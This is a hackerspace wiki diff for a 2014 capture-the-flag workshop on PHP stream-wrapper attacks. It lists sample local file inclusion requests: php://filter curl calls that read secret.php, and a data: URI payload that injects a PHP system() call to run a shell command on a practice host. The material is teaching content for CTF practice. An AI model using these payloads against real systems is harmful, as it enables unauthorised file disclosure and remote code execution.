Difference between revisions of "CTF-practice-evening:2014-06-23"

From Technologia Incognita
Jump to: navigation, search
(inserted a few spaces so crawlers don't hit these links and trip my IDS)
 
Line 27: Line 27:
  
 
* Example of LFI attacks:
 
* Example of LFI attacks:
** 'php://filter LFI curl -X GET 'http://coolfire.insomnia247.nl/20140623/index.php?page=php://filter/read=string.toupper/resource=secret.php'
+
** 'php://filter LFI curl -X GET 'http://coolfire.insomnia247 .nl/20140623/index.php?page=php://filter/read=string.toupper/resource=secret.php'
** 'php://filter LFI curl -X GET 'http://coolfire.insomnia247.nl/20140623/index.php?page=php://filter/convert.base64-encode/resource=secret.php'
+
** 'php://filter LFI curl -X GET 'http://coolfire.insomnia247 .nl/20140623/index.php?page=php://filter/convert.base64-encode/resource=secret.php'
** http://coolfire.insomnia247.nl/20140623/index.php?page=data:text/plain;charset=utf-8%,%C%3Fsystem%28%24_GET[%27]%29%3B%3F%3E&inject=ls%20-la
+
** http://coolfire.insomnia247 .nl/20140623/index.php?page=data:text/plain;charset=utf-8%,%C%3Fsystem%28%24_GET[%27]%29%3B%3F%3E&inject=ls%20-la
 
** ( expect:// )
 
** ( expect:// )
 
** arrays: /index.php?page[]=A&page[]=B
 
** arrays: /index.php?page[]=A&page[]=B

Latest revision as of 08:56, 21 May 2015

CTF-practice-evening:2014-06-23
Date 2014/06/23
Time
Location ACTA
Type Workshop
Contact Melanie

Capture The Flag evening - Part 20

  • 23 June, 2014 - 7 PM
  • Please bring along a laptop with you!!!

General CTF Info

PHP Filter attacks

  • Coolfire is providing the content for this evening!  :-)
  • PHP commands:
    • php://input
    • output
    • df
    • memory
    • temp
    • filter
  • Example of LFI attacks:
    • 'php://filter LFI curl -X GET 'http://coolfire.insomnia247 .nl/20140623/index.php?page=php://filter/read=string.toupper/resource=secret.php'
    • 'php://filter LFI curl -X GET 'http://coolfire.insomnia247 .nl/20140623/index.php?page=php://filter/convert.base64-encode/resource=secret.php'
    • http://coolfire.insomnia247 .nl/20140623/index.php?page=data:text/plain;charset=utf-8%,%C%3Fsystem%28%24_GET[%27]%29%3B%3F%3E&inject=ls%20-la
    • ( expect:// )
    • arrays: /index.php?page[]=A&page[]=B

Enigma group PHP challenges

  • We solved challenges 1-11 together on the beamer!  :-)